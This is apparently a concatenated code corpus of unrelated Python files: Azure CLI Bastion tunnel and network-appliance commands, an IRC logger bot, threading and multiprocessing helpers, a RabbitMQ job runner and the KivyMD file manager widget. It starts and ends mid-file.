elif auth_type.lower() == 'ssh-key':
if username is None or ssh_key is None:
raise RequiredArgumentMissingError("Please enter username --username and ssh cert location --ssh-key.")
command = [_get_ssh_path(), _get_host(username, 'localhost')]
command = command + _build_args(None, ssh_key)
else:
raise UnrecognizedArgumentError("Unknown auth type. Use one of password, aad or ssh-key.")
command = command + ["-p", str(tunnel_server.local_port)]
command = command + ['-o', "StrictHostKeyChecking=no", '-o', "UserKnownHostsFile=/dev/null"]
command = command + ['-o', "LogLevel=Error"]
logger.debug("Running ssh command %s", ' '.join(command))
try:
subprocess.call(command, shell=platform.system() == 'Windows')
except Exception as ex:
raise CLIInternalError(ex)
def rdp_bastion_host(cmd, target_resource_id, resource_group_name, bastion_host_name, resource_port=None):
if not resource_port:
resource_port = 3389
if not is_valid_resource_id(target_resource_id):
raise InvalidArgumentValueError("Please enter a valid Virtual Machine resource Id.")
if platform.system() == 'Windows':
tunnel_server = get_tunnel(cmd, resource_group_name, bastion_host_name, target_resource_id, resource_port)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
command = [_get_rdp_path(), "/v:localhost:{0}".format(tunnel_server.local_port)]
logger.debug("Running rdp command %s", ' '.join(command))
from ._process_helper import launch_and_wait
launch_and_wait(command)
tunnel_server.cleanup()
else:
raise UnrecognizedArgumentError("Platform is not supported for this command. Supported platforms: Windows")
def get_tunnel(cmd, resource_group_name, name, vm_id, resource_port, port=None):
from .tunnel import TunnelServer
client = network_client_factory(cmd.cli_ctx).bastion_hosts
bastion = client.get(resource_group_name, name)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
tunnel_server = TunnelServer(cmd.cli_ctx, 'localhost', port, bastion, vm_id, resource_port)
return tunnel_server
def create_bastion_tunnel(cmd, target_resource_id, resource_group_name, bastion_host_name, resource_port, port, timeout=None):
if not is_valid_resource_id(target_resource_id):
raise InvalidArgumentValueError("Please enter a valid Virtual Machine resource Id.")
tunnel_server = get_tunnel(cmd, resource_group_name, bastion_host_name, target_resource_id, resource_port, port)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.is_alive():
time.sleep(5)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
# endregion
# region security partner provider
def create_security_partner_provider(cmd, resource_group_name, security_partner_provider_name,
security_provider_name, virtual_hub, location=None, tags=None):
client = network_client_factory(cmd.cli_ctx).security_partner_providers
SecurityPartnerProvider, SubResource = cmd.get_models('SecurityPartnerProvider', 'SubResource')
security_partner_provider = SecurityPartnerProvider(security_provider_name=security_provider_name,
virtual_hub=SubResource(id=virtual_hub),
location=location,
tags=tags)
return client.begin_create_or_update(resource_group_name=resource_group_name,
security_partner_provider_name=security_partner_provider_name,
parameters=security_partner_provider)
def update_security_partner_provider(instance, cmd, security_provider_name=None, virtual_hub=None, tags=None):
with cmd.update_context(instance) as c:
c.set_param('security_provider_name', security_provider_name)
c.set_param('virtual_hub', virtual_hub)
c.set_param('tags', tags)
return instance
def list_security_partner_provider(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).security_partner_providers
if resource_group_name is not None:
return client.list_by_resource_group(resource_group_name=resource_group_name)
return client.list()
# endregion
# region network gateway connection
def reset_shared_key(cmd, client, virtual_network_gateway_connection_name, key_length, resource_group_name=None):
ConnectionResetSharedKey = cmd.get_models('ConnectionResetSharedKey')
shared_key = ConnectionResetSharedKey(key_length=key_length)
return client.begin_reset_shared_key(resource_group_name=resource_group_name,
virtual_network_gateway_connection_name=virtual_network_gateway_connection_name, # pylint: disable=line-too-long
parameters=shared_key)
def update_shared_key(cmd, instance, value):
with cmd.update_context(instance) as c:
c.set_param('value', value)
return instance
# endregion
# region network virtual appliance
def create_network_virtual_appliance(cmd, client, resource_group_name, network_virtual_appliance_name,
vendor, bundled_scale_unit, market_place_version,
virtual_hub, boot_strap_configuration_blobs=None,
cloud_init_configuration_blobs=None,
cloud_init_configuration=None, asn=None,
location=None, tags=None, no_wait=False):
(NetworkVirtualAppliance,
SubResource,
VirtualApplianceSkuProperties) = cmd.get_models('NetworkVirtualAppliance',
'SubResource',
'VirtualApplianceSkuProperties')
virtual_appliance = NetworkVirtualAppliance(boot_strap_configuration_blobs=boot_strap_configuration_blobs,
cloud_init_configuration_blobs=cloud_init_configuration_blobs,
cloud_init_configuration=cloud_init_configuration,
virtual_appliance_asn=asn,
virtual_hub=SubResource(id=virtual_hub),
nva_sku=VirtualApplianceSkuProperties(
vendor=vendor,
bundled_scale_unit=bundled_scale_unit,
market_place_version=market_place_version
),
location=location,
tags=tags)
return sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, network_virtual_appliance_name, virtual_appliance)
def update_network_virtual_appliance(instance, cmd, cloud_init_configuration=None, asn=None):
with cmd.update_context(instance) as c:
c.set_param('virtual_appliance_asn', asn)
c.set_param('cloud_init_configuration', cloud_init_configuration)
return instance
def list_network_virtual_appliance(cmd, client, resource_group_name=None):
if resource_group_name:
return client.list_by_resource_group(resource_group_name=resource_group_name)
return client.list()
def create_network_virtual_appliance_site(cmd, client, resource_group_name, network_virtual_appliance_name,
site_name, address_prefix, allow=None, optimize=None, default=None,
no_wait=False):
(BreakOutCategoryPolicies,
Office365PolicyProperties,
VirtualApplianceSite) = cmd.get_models('BreakOutCategoryPolicies',
'Office365PolicyProperties',
'VirtualApplianceSite')
virtual_appliance_site = VirtualApplianceSite(address_prefix=address_prefix,
o365_policy=Office365PolicyProperties(
break_out_categories=BreakOutCategoryPolicies(
allow=allow,
optimize=optimize,
default=default
)))
return sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, network_virtual_appliance_name, site_name, virtual_appliance_site)
def update_network_virtual_appliance_site(instance, cmd, address_prefix, allow=None, optimize=None, default=None):
with cmd.update_context(instance) as c:
c.set_param('address_prefix', address_prefix)
c.set_param('o365_policy.break_out_categories.allow', allow)
c.set_param('o365_policy.break_out_categories.optimize', optimize)
c.set_param('o365_policy.break_out_categories.default', default)
return instance
# endregion
|
bot.py
|
import ssl
import logging
from threading import Thread
from irc.client import NickMask
from irc.connection import Factory
from irc.bot import SingleServerIRCBot, ExponentialBackoff
from irclogger.channel import Channel
log = logging.getLogger("irc-logger")
RECONNECT_TIMEOUT = 10
def handle_client(bot, f):
while True:
data = f.read()
if not data:
break
lines = data.splitlines()
for line in lines:
bot.say(line)
def channel_reader(bot):
while True:
with bot.log_channel.open() as f:
handle_client(bot, f)
class Bot(SingleServerIRCBot):
def __init__(self, host, port, channel, name):
if channel[0] != '#':
channel = "#" + channel
super(Bot, self).__init__([(host, port)], name, name,
recon=ExponentialBackoff(min_interval=RECONNECT_TIMEOUT, max_interval=2*RECONNECT_TIMEOUT),
connect_factory=Factory(wrapper=ssl.wrap_socket))
self.name = name
self.channel = channel
self.log_channel = Channel(self.name)
@property
def server_host(self):
return self.server_list[0].host
@property
def server_port(self):
return self.server_list[0].port
def say(self, fmt, *args, **kwargs):
self.connection.privmsg(self.channel, fmt.format(*args, **kwargs))
def on_welcome(self, _, event):
log.info('connected to %s, joining %s...', self.server_host, self.channel)
self.connection.join(self.channel)
def on_join(self, _, event):
nm = NickMask(event.source)
if nm.nick == self.name:
log.info('joined %s', self.channel)
self.log_channel.create()
thread = Thread(target=channel_reader, args=(self,))
thread.daemon = True
thread.start()
def on_disconnect(self, _, event):
log.info('disconnected from %s', self.server_host)
self.log_channel.remove()
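if __name__ == "__main__":
    # Usage sketch added for illustration; it is not part of the original
    # module. The host, port, channel and nick below are placeholder values.
    logging.basicConfig(level=logging.INFO)
    bot = Bot("irc.example.org", 6697, "#logs", "irc-logger")
    # SingleServerIRCBot.start() connects and then blocks on the IRC event loop.
    bot.start()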
|
imthread.py
|
import threading, time
t_index = 0
class multi_threading():
def __init__(self, processing_func, max_threads=10):
assert type(max_threads) == int, 'max_threads value should be an integer'
assert max_threads > 0, 'max_threads value cannot be less than 1'
self.process = processing_func
if max_threads == 1:
self.max_threads = max_threads
else:
self.max_threads = max_threads - 1
self.threads_ended = False
self.stop_execution = False
def start(self, data):
if type(data) == int:
pseudo_infinity = data
else:
pseudo_infinity = len(data)
index_processed_data = {}
def process_frames(data):
global t_index
# bookkeeping for the newly started thread ==========
self.threads_ended = False  # a new thread has started
t_index = data[0] + 1
# threads that were asked to stop but are still running exit early
if self.stop_execution:
return None
try:
processed_data = self.process(data[1]) #actually processing the data
except Exception as e:
processed_data = None
if str(e) == 'stop': #if manually stop exception raised
if not self.stop_execution:
self.stop_execution = True
print('Exception: Stop All Threads')
else:
print(e)
finally:
# add the processed data to the results dict =========
index_processed_data.update({data[0]: processed_data})
# ====================================================
# only set threads_ended to True when the last of the
# maximum number of threads has finished
if data[0] % self.max_threads == 0:
self.threads_ended = True
# ====================================================
threads = []
for i in range(0, pseudo_infinity):
# creating threads=================================================
try:
index_data = data[i]
except Exception:
index_data = i
args = (i,index_data)
t = threading.Thread(target=process_frames, name='t', args=(args,))
#==================================================================
# starting threads=================================================
if self.stop_execution:
break
threads.append(t)
t.daemon = True
t.start()
# check whether the maximum number of threads has been created
if i % self.max_threads == 0:
# wait for the previous batch of threads to finish
if i != 0:  # skipping the first batch
while not self.threads_ended:
if self.stop_execution:
break
pass
#==================================================================
#waiting for all the
#threads to finish
for t in threads:
if self.stop_execution:
break
t.join()
#=====================================
#sorting in the order the data was received====
index = sorted(index_processed_data.keys())
sorted_data = []
for i in range(0, len(index)):
#print(processed_frames[i])
try:
sorted_data.append(index_processed_data[i])
except Exception as e:
print(e)
#==============================================
return sorted_data
def console_log(output=False):
global t_index
data = t_index
if output:
print(f'>> Creating Threads {data}')
return data
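if __name__ == '__main__':
    # Usage sketch added for illustration; it is not part of the original
    # module. It processes a list of numbers on up to 10 worker threads and
    # prints the results in their original input order.
    def square(x):
        return x * x

    runner = multi_threading(square, max_threads=10)
    print(runner.start(list(range(20))))  # -> [0, 1, 4, 9, ..., 361]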
|
cmd_runner_rabbit.py
|
# Build and run the executable as part of a rabbit runner.
import sys
import pika
import json
import os
import shutil
import logging
import threading
import base64
import zipfile
import tempfile
def check_log_file_for_fatal_errors(lines):
'''Return True if the log file contains a fatal error that means we should
not be re-running this. False otherwise.
'''
# Look for a file access error. If that is found, then assume that is a good
# file and we just are having a network problem. So re-submit.
# todo: this is a fatal error for now
# if any(l for l in lines if "[3011] Unable to open" in l):
# return False
# If we are here, we don't know what caused this. Assume it is really bad and return true.
return True
def process_message(xrootd_node, ch, method, properties, body, connection):
'''
Process each message and run the C++ for it.
Arguments:
xrootd_node xrootd server to store results on
ch rabbit mq channel
method rabbit mq method
properties rabbit mq properties
body body of the incoming message (json)
connection rabbit mq connection
'''
# Make sure nothing from the previous job is sitting there waiting.
if os.path.exists('/home/atlas/rel'):
shutil.rmtree('/home/atlas/rel')
# Unpack the incoming message.
r = json.loads(body)
hash = r['hash']
code_hash = r['hash_source']
main_script = r['main_script']
input_files = r['files']
output_file = r['output_file']
xrootd_file = "root://" + xrootd_node + "//" + output_file
logging.info('We are looking at an xrootd file: ' + xrootd_file)
source_files = r['file_data']
# Unpack the source files we are going to run against
zip_filename = os.path.join(tempfile.gettempdir(), code_hash + '.zip')
with open(zip_filename, 'wb') as zip_data:
zip_data.write(base64.b64decode(source_files))
logging.info('Length of binary data we got: ' + str(len(source_files)))
zip_output = os.path.join(tempfile.gettempdir(), code_hash + '_files')
if not os.path.exists(zip_output):
os.mkdir(zip_output)
with zipfile.ZipFile(zip_filename, 'r') as zip_ref:
zip_ref.extractall(zip_output)
# Write the file list that we are to process
with open('filelist.txt', 'w') as f:
for f_name in input_files:
f.write(f_name + '\n')
log_file = os.path.join(tempfile.gettempdir(), code_hash + '.log')
# Now run the thing.
connection.add_callback_threadsafe(lambda: ch.basic_publish(exchange='', routing_key='status_change_state', body=json.dumps({'hash': hash, 'phase': 'running'})))
rtn_code = os.system('set -o pipefail; sh ' + zip_output + '/' + main_script + " " + xrootd_file + ' 2>&1 | tee ' + log_file)
logging.info('Return code from run: ' + str(rtn_code))
retry_message = False
if rtn_code != 0:
# First, do we need to re-try this crash or not?
with open(log_file) as f:
content = f.read().splitlines()
# Log the error message.
connection.add_callback_threadsafe(lambda: ch.basic_publish(exchange='', routing_key='crashed_request',
body=json.dumps({'hash': hash, 'message': 'while building and running xAOD', 'log': content})))
# If it is fatal, then we move this job to crashed
is_fatal = check_log_file_for_fatal_errors(content)
if is_fatal:
# Report the error and the log file.
connection.add_callback_threadsafe(lambda: ch.basic_publish(exchange='', routing_key='status_change_state', body=json.dumps({'hash': hash, 'phase': 'crashed'})))
else:
# We want to put the message back on the queue and have someone else try it out.
retry_message = True
else:
# Update the status, and send the file on for use by the person that requested it.
connection.add_callback_threadsafe(lambda: ch.basic_publish(exchange='', routing_key='status_change_state', body=json.dumps({'hash': hash, 'phase': 'done'})))
connection.add_callback_threadsafe(lambda: ch.basic_publish(exchange='', routing_key='status_add_file', body=json.dumps({'hash': hash, 'file': output_file, 'treename': r['treename']})))
# This is as far as we go.
if retry_message:
connection.add_callback_threadsafe(lambda: ch.basic_reject(delivery_tag=method.delivery_tag, requeue=True))
else:
connection.add_callback_threadsafe(lambda: ch.basic_ack(delivery_tag=method.delivery_tag))
def start_message_processing_thread(xrootd_node, ch, method, properties, body, connection):
''' Starts a message processing in a new thread.
This is so the msg recv loop doesn't need to remain busy.
'''
logging.debug('Firing off a thread processing.')
t = threading.Thread(target=process_message, args=(xrootd_node, ch, method, properties, body, connection))
t.start()
logging.debug('done loading the thread up.')
def listen_to_queue(rabbit_node, xrootd_node, rabbit_user, rabbit_pass):
'''Connect to RabbitMQ, set up the queues, and consume work from the run_cpp queue.'''
# Connect and setup the queues we will listen to and push once we've done.
if rabbit_pass in os.environ:
rabbit_pass = os.environ[rabbit_pass]
credentials = pika.PlainCredentials(rabbit_user, rabbit_pass)
connection = pika.BlockingConnection(pika.ConnectionParameters(host=rabbit_node, credentials=credentials))
channel = connection.channel()
# We run pretty slowly, so make sure this consumer doesn't prefetch too many messages.
channel.basic_qos(prefetch_count=1)
# We pull tasks off this guy.
channel.queue_declare(queue='run_cpp')
# Let them know about progress
channel.queue_declare(queue='status_change_state')
# Add files as they complete
channel.queue_declare(queue='status_add_file')
# Record a crash
channel.queue_declare(queue='crashed_request')
# Listen for work to show up.
channel.basic_consume(queue='run_cpp', on_message_callback=lambda ch, method, properties, body: start_message_processing_thread(xrootd_node, ch, method, properties, body, connection), auto_ack=False)
# We are setup. Off we go. We'll never come back.
channel.start_consuming()
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
bad_args = len(sys.argv) != 5
if bad_args:
print "Usage: python cmd_runner_rabbit.py <rabbit-mq-node-address> <xrootd-results_node> <rabbit-username> <rabbit-password>"
else:
listen_to_queue(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])
|
filemanager.py
|
"""
Components/File Manager
=======================
A simple manager for selecting directories and files.
Usage
-----
.. code-block:: python
path = '/' # path to the directory that will be opened in the file manager
file_manager = MDFileManager(
exit_manager=self.exit_manager, # function called when the user reaches directory tree root
select_path=self.select_path, # function called when selecting a file/directory
)
file_manager.show(path)
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/file-manager.png
:align: center
Or with ``previous`` mode:
.. code-block:: python
file_manager = MDFileManager(
exit_manager=self.exit_manager,
select_path=self.select_path,
previous=True,
)
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/file-manager-previous.png
:align: center
Example
-------
.. code-block:: python
from kivy.core.window import Window
from kivy.lang import Builder
from kivymd.app import MDApp
from kivymd.uix.filemanager import MDFileManager
from kivymd.toast import toast
KV = '''
BoxLayout:
orientation: 'vertical'
MDToolbar:
title: "MDFileManager"
left_action_items: [['menu', lambda x: None]]
elevation: 10
FloatLayout:
MDRoundFlatIconButton:
text: "Open manager"
icon: "folder"
pos_hint: {'center_x': .5, 'center_y': .6}
on_release: app.file_manager_open()
'''
class Example(MDApp):
def __init__(self, **kwargs):
super().__init__(**kwargs)
Window.bind(on_keyboard=self.events)
self.manager_open = False
self.file_manager = MDFileManager(
exit_manager=self.exit_manager,
select_path=self.select_path,
previous=True,
)
def build(self):
return Builder.load_string(KV)
def file_manager_open(self):
self.file_manager.show('/') # output manager to the screen
self.manager_open = True
def select_path(self, path):
'''It will be called when you click on the file name
or the catalog selection button.
:type path: str;
:param path: path to the selected directory or file;
'''
self.exit_manager()
toast(path)
def exit_manager(self, *args):
'''Called when the user reaches the root of the directory tree.'''
self.manager_open = False
self.file_manager.close()
def events(self, instance, keyboard, keycode, text, modifiers):
'''Called when buttons are pressed on the mobile device.'''
if keyboard in (1001, 27):
if self.manager_open:
self.file_manager.back()
return True
Example().run()
"""
__all__ = ("MDFileManager",)
import os
import threading
from kivy.app import App
from kivy.lang import Builder
from kivy.metrics import dp
from kivy.properties import (
BooleanProperty,
ListProperty,
NumericProperty,
ObjectProperty,
OptionProperty,
StringProperty,
)
from kivy.uix.anchorlayout import AnchorLayout
from kivy.uix.behaviors import ButtonBehavior
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.image import AsyncImage
from kivy.uix.modalview import ModalView
from PIL import Image
from kivymd import images_path
from kivymd.theming import ThemableBehavior
from kivymd.toast import toast
from kivymd.uix.floatlayout import MDFloatLayout
from kivymd.uix.list import BaseListItem, ContainerSupport
ACTIVITY_MANAGER = """
#:import os os
<BodyManager@BoxLayout>
icon: 'folder'
path: ''
background_normal: ''
background_down: ''
dir_or_file_name: ''
events_callback: lambda x: None
orientation: 'vertical'
ModifiedOneLineIconListItem:
text: root.dir_or_file_name
on_release: root.events_callback(root.path)
IconLeftWidget:
icon: root.icon
theme_text_color: "Custom"
text_color: self.theme_cls.primary_color
MDSeparator:
<LabelContent@MDLabel>
size_hint_y: None
height: self.texture_size[1]
shorten: True
shorten_from: 'center'
halign: 'center'
text_size: self.width, None
<BodyManagerWithPrevious>
paths: []
path: ''
type: 'folder'
events_callback: lambda x: None
MDGridLayout:
id: grid_box
cols: 3
row_default_height: (self.width - self.cols * self.spacing[0]) / self.cols
row_force_default: True
adaptive_height: True
padding: dp(4), dp(4)
spacing: dp(4)
BoxLayout:
orientation: 'vertical'
IconButton:
mipmap: True
size_hint_y: None
height: dp(100) if self.source and os.path.split(self.source)[1] == "folder.png" else dp(50)
source: root.get_source(root.type, label_box_1, root.paths, 1)
on_release: root.events_callback(os.path.join(root.path, label_box_1.text))
LabelContent:
id: label_box_1
text: os.path.split(root.paths[0])[1].replace('thumb_', '') if len(root.paths) >= 1 else ''
BoxLayout:
orientation: 'vertical'
IconButton:
mipmap: True
size_hint_y: None
height: dp(100) if self.source and os.path.split(self.source)[1] == "folder.png" else dp(50)
source: root.get_source(root.type, label_2, root.paths, 2)
on_release: root.events_callback(os.path.join(root.path, label_2.text))
LabelContent:
id: label_2
text: os.path.split(root.paths[1])[1].replace('thumb_', '') if len(root.paths) >= 2 else ''
BoxLayout:
orientation: 'vertical'
IconButton:
mipmap: True
size_hint_y: None
height: dp(100) if self.source and os.path.split(self.source)[1] == "folder.png" else dp(50)
source: root.get_source(root.type, label_3, root.paths, 3)
on_release: root.events_callback(os.path.join(root.path, label_3.text))
LabelContent:
id: label_3
text: os.path.split(root.paths[2])[1].replace('thumb_', '') if len(root.paths) >= 3 else ''
<FloatButton>
anchor_x: 'right'
anchor_y: 'bottom'
size_hint_y: None
height: dp(56)
padding: dp(10)
MDFloatingActionButton:
size_hint: None, None
size: dp(56), dp(56)
icon: root.icon
opposite_colors: True
elevation: 8
on_release: root.callback()
md_bg_color: root.md_bg_color
<MDFileManager>
md_bg_color: root.theme_cls.bg_normal
BoxLayout:
orientation: 'vertical'
spacing: dp(5)
MDToolbar:
id: toolbar
title: '%s' % root.current_path
right_action_items: [['close-box', lambda x: root.exit_manager(1)]]
left_action_items: [['chevron-left', lambda x: root.back()]]
elevation: 10
RecycleView:
id: rv
key_viewclass: 'viewclass'
key_size: 'height'
bar_width: dp(4)
bar_color: root.theme_cls.primary_color
on_scroll_stop: root._update_list_images()
RecycleBoxLayout:
padding: dp(10)
default_size: None, dp(48)
default_size_hint: 1, None
size_hint_y: None
height: self.minimum_height
orientation: 'vertical'
<ModifiedOneLineIconListItem>
BoxLayout:
id: _left_container
size_hint: None, None
x: root.x + dp(16)
y: root.y + root.height / 2 - self.height / 2
size: dp(48), dp(48)
"""
class IconButton(ButtonBehavior, AsyncImage):
pass
class FloatButton(AnchorLayout):
callback = ObjectProperty()
md_bg_color = ListProperty([1, 1, 1, 1])
icon = StringProperty()
class ModifiedOneLineIconListItem(ContainerSupport, BaseListItem):
_txt_left_pad = NumericProperty("72dp")
_txt_top_pad = NumericProperty("16dp")
_txt_bot_pad = NumericProperty("15dp")
_num_lines = 1
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.height = dp(48)
class BodyManagerWithPrevious(BoxLayout):
def get_source(self, source_type, instance_label, paths, index):
if source_type == "folder" and instance_label.text != "":
source = self.icon_folder
else:
if len(paths) >= index:
source = paths[index - 1]
else:
source = f"{images_path}transparent.png"
return source
class MDFileManager(ThemableBehavior, MDFloatLayout):
icon = StringProperty("check")
"""
The icon that will be used on the directory selection button.
:attr:`icon` is an :class:`~kivy.properties.StringProperty`
and defaults to `check`.
"""
icon_folder = StringProperty(f"{images_path}folder.png")
"""
The icon that will be used for the folder icon when ``previous = True``.
:attr:`icon_folder` is an :class:`~kivy.properties.StringProperty`
and defaults to `images_path + "folder.png"`.
"""
exit_manager = ObjectProperty(lambda x: None)
"""
Function called when the user reaches the directory tree root.
:attr:`exit_manager` is an :class:`~kivy.properties.ObjectProperty`
and defaults to `lambda x: None`.
"""
select_path = ObjectProperty(lambda x: None)
"""
Function called when a file or directory is selected.
:attr:`select_path` is an :class:`~kivy.properties.ObjectProperty`
and defaults to `lambda x: None`.
"""
ext = ListProperty()
"""
List of file extensions to be displayed
in the manager. For example, `['py', 'kv']` will filter out all files
except Python scripts and Kv Language files.
:attr:`ext` is an :class:`~kivy.properties.ListProperty`
and defaults to `[]`.
"""
search = OptionProperty("all", options=["all", "dirs", "files"])
"""
Controls what is displayed: `'dirs'` shows only directories, `'files'` shows
only files, and `'all'` (the default) shows both.
Available options are: `'all'`, `'dirs'`, `'files'`.
:attr:`search` is an :class:`~kivy.properties.OptionProperty`
and defaults to `all`.
"""
current_path = StringProperty(os.getcwd())
"""
Current directory.
:attr:`current_path` is an :class:`~kivy.properties.StringProperty`
and defaults to the result of `os.getcwd()`.
"""
use_access = BooleanProperty(True)
"""
Show access to files and directories.
:attr:`use_access` is an :class:`~kivy.properties.BooleanProperty`
and defaults to `True`.
"""
previous = BooleanProperty(False)
"""
If `True`, the manager shows image previews (thumbnails) instead of the plain file list.
:attr:`previous` is an :class:`~kivy.properties.BooleanProperty`
and defaults to `False`.
"""
_window_manager = None
_window_manager_open = False
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.history = [] # directory navigation history
# If False, the current directory is not appended to the history
# (set to False by back() so that navigating back does not re-append it).
self.history_flag = True
toolbar_label = self.ids.toolbar.children[1].children[0]
toolbar_label.font_style = "Subtitle1"
self.ext = [".png", ".jpg", ".jpeg"]
self.app = App.get_running_app()
if not os.path.exists(os.path.join(self.app.user_data_dir, "thumb")):
os.mkdir(os.path.join(self.app.user_data_dir, "thumb"))
action_button = FloatButton(
callback=self.select_directory_on_press_button,
md_bg_color=self.theme_cls.primary_color,
icon=self.icon,
)
self.add_widget(action_button)
def show(self, path):
"""Forms the body of a directory tree.
:param path: The path to the directory that will be opened in the file manager.
"""
dirs, files = self.get_content(path)
if self.previous:
threading.Thread(target=self._create_previous, args=(path,)).start()
split_dirs = self._split_list(dirs, 3)
split_files = self._split_list(files, 3)
self.current_path = path
manager_list = []
if dirs == [] and files == []:  # the directory is empty; still display it
pass
elif not dirs and not files:  # get_content() returned (None, None): directory is unavailable
return
if self.previous:
for list_dirs in split_dirs:
manager_list.append(
{
"viewclass": "BodyManagerWithPrevious",
"path": path,
"icon_folder": self.icon_folder,
"paths": list_dirs,
"type": "folder",
"events_callback": self.select_dir_or_file,
"height": dp(105),
}
)
for list_files in list(split_files):
manager_list.append(
{
"viewclass": "BodyManagerWithPrevious",
"path": path,
"icon_folder": self.icon_folder,
"paths": list_files,
"type": "files",
"events_callback": self.select_dir_or_file,
"height": dp(105),
}
)
else:
for name in dirs:
_path = path + name if path == "/" else path + "/" + name
access_string = self.get_access_string(_path)
if "r" not in access_string:
icon = "folder-lock"
else:
icon = "folder"
manager_list.append(
{
"viewclass": "BodyManager",
"path": _path,
"icon": icon,
"dir_or_file_name": name,
"events_callback": self.select_dir_or_file,
}
)
for name in files:
_path = path + name if path == "/" else path + "/" + name
manager_list.append(
{
"viewclass": "BodyManager",
"path": _path,
"icon": "file-outline",
"dir_or_file_name": name,
"events_callback": self.select_dir_or_file,
}
)
self.ids.rv.data = manager_list
if not self._window_manager:
self._window_manager = ModalView(
size_hint=(1, 1), auto_dismiss=False
)
self._window_manager.add_widget(self)
if not self._window_manager_open:
self._window_manager.open()
self._window_manager_open = True
def count_ext(self, path):
ext = os.path.splitext(path)[1]
if ext != "":
if ext.lower() in self.ext or ext.upper() in self.ext:
return True
return False
def get_access_string(self, path):
access_string = ""
if self.use_access:
access_data = {"r": os.R_OK, "w": os.W_OK, "x": os.X_OK}
for access in access_data.keys():
access_string += (
access if os.access(path, access_data[access]) else "-"
)
return access_string
def get_content(self, path):
"""Returns a tuple ``(directories, files)``, or ``(None, None)`` if the directory is unavailable."""
try:
files = []
dirs = []
if self.history_flag:
self.history.append(path)
if not self.history_flag:
self.history_flag = True
for content in os.listdir(path):
if os.path.isdir(os.path.join(path, content)):
if self.search == "all" or self.search == "dirs":
dirs.append(content)
else:
if self.search == "all" or self.search == "files":
if len(self.ext) != 0:
try:
if self.count_ext(content):
if self.previous:
files.append(
os.path.join(
self.app.user_data_dir,
"thumb",
f"thumb_{content}",
)
)
else:
files.append(content)
except IndexError:
pass
else:
files.append(content)
return dirs, files
except OSError:
self.history.pop()
return None, None
def close(self):
"""Closes the file manager window."""
self._window_manager.dismiss()
self._window_manager_open = False
def select_dir_or_file(self, path):
"""Called by tap on the name of the directory or file."""
if os.path.isfile(path):
self.select_path(path)
return
self.current_path = path
self.show(path)
def back(self):
"""Steps one level back in the directory tree history."""
if len(self.history) == 1:
path, end = os.path.split(self.history[0])
if end == "":
self.close()
self.exit_manager(1)
return
self.history[0] = path
else:
self.history.pop()
path = self.history[-1]
self.history_flag = False
self.select_dir_or_file(path)
def select_directory_on_press_button(self, *args):
"""Called when the floating action button is pressed."""
self.select_path(self.current_path)
def _update_list_images(self):
self.ids.rv.refresh_from_layout()
def _split_list(self, lst, n):
if lst:
n = max(1, n)
return (lst[i : i + n] for i in range(0, len(lst), n))
else:
return []
def _create_previous(self, path):
if "r" not in self.get_access_string(path):
toast("PermissionError")
return
for image in os.listdir(path):
_path = os.path.join(path, image)
if os.path.isfile(_path):
if self.count_ext(_path):
path_to_thumb = os.path.join(
self.app.user_data_dir, "thumb", f"thumb_{image}"
)
if not os.path.exists(path_to_thumb):
im = Image.open(_path)
im.thumbnail((200, 200))
im.save(path_to_thumb, "PNG")
Builder.load_string(ACTIVITY_MANAGER)
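
# --- Editor's illustrative sketch (not part of the original module) ---
# A minimal, hedged example of how MDFileManager might be wired up from
# application code. It assumes a running KivyMD application (the constructor
# relies on App.get_running_app()); only attributes defined above are used,
# and the callback names passed in by the caller are placeholders.
def _demo_open_file_manager(on_path_selected, on_exit):
    """Create an MDFileManager, wire the caller's callbacks, and open it
    on the current working directory."""
    manager = MDFileManager(
        select_path=on_path_selected,  # called with the chosen file/directory path
        exit_manager=on_exit,          # called when the user leaves the tree root
    )
    manager.show(os.getcwd())  # builds the RecycleView data and opens the ModalView
    return manager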
|
AsyncProcessing.py
|
import multiprocessing
import os
_lastMultiProcessId = -1 # Start of our initial id
class MultiProcess():
"""Manages a single process, using a unique id as an
identifier; the target is the function to be run.
"""
def __init__(self, Id: int = 0):
"""Initiates a MultiProcess object to support an async
function.
Usage:
----
MultiProcess(Id: int = 0)
"""
# Let's check for an available ID
global _lastMultiProcessId
if Id == _lastMultiProcessId or _lastMultiProcessId == -1:
Id = _lastMultiProcessId + 1
_lastMultiProcessId = Id
self._Id = Id
self.target = None
self.process: multiprocessing.Process = None
def run(self, targetFunction = None):
"""Will run the target process if the target
function exists.
"""
if targetFunction is None:
print("Cannot run a process without a target process to use.")
return
self.target = targetFunction
process = multiprocessing.Process(target = targetFunction)
self.process = process
print("Starting " + targetFunction.__name__)
process.start()
return
def stop(self):
"""Will stop the process if the process still exists"""
if self.process is None:
print("Cannot stop a process that doesn't exist.")
return
print("Stopping " + self.target.__name__)
self.process.terminate()
if not self.process.is_alive():
self.process.close()
self.process = None
return
@property
def get_id(self):
"""Returns the ID that was set during initialization"""
return self._Id
class ProcessContainer():
"""Container that holds each async process, keyed by its id.
Usage:
----
container = ProcessContainer()
container.add_or_delete_processList(multiprocess_obj, delete=False)
"""
def __init__(self, processList=None) -> None:
self._processList = processList if processList is not None else {}
def add_or_delete_processList(self, Process: MultiProcess, delete: bool = False):
"""Adds or deletes a multiprocess object within the process
list by using the id as an index
Usage:
----
add_or_delete_processList(Multiprocess object, delete = True or False)
"""
id = Process.get_id
if delete is True:
if id in self._processList:
del self._processList[id]
else:
self._processList[id] = Process
def id_in_processList(self, Process: MultiProcess, Id: int) -> bool:
"""Checks for a valid id within the process list
Returns:
----
